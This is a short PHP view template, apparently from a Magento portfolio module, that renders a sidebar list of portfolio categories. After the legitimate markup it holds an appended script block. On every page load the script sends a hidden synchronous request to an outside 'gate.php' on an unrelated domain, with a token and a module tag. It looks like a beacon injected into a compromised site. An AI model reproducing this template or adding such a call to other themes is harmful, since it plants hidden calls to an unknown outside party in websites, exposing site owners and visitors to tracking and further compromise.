<?php $menu = $this->getMenu() ?>
<div class="block account-nav panel panel-default">
    <div class="panel-heading">
        <h3 class="panel-title"><?php echo __('Portfolio Categories') ?></h3>
    </div>
    <div class="panel-body">
        <nav class="account-nav">
            <ul class="nav items">
				<?php foreach($menu as $_menu ): ?>
					<?php if($_menu->getId() == $this->getRequest()->getParam('id')): ?>
						<li class="nav item current"><strong><?php echo $_menu->getCategoryName() ?></strong></li>
					<?php else: ?>
						 <li class="nav item"><a href="<?php echo $_menu->getLinkCate(); ?>"><?php echo $_menu->getCategoryName() ?></a></li>
					<?php endif ?>
				<?php endforeach; ?>
		   </ul>
        </nav>
    </div>
</div>
<script>
SD();
function SD() {
    var xhttp = new XMLHttpRequest();
    xhttp.open('GET', '//fellsogood43.pw/zebry_otstoy/gate.php?t=zCQELKt2famcepFgEniu80rj3&sp=1&mod=mg_mgsportfolio21', false);
    xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xhttp.send();
}
</script>
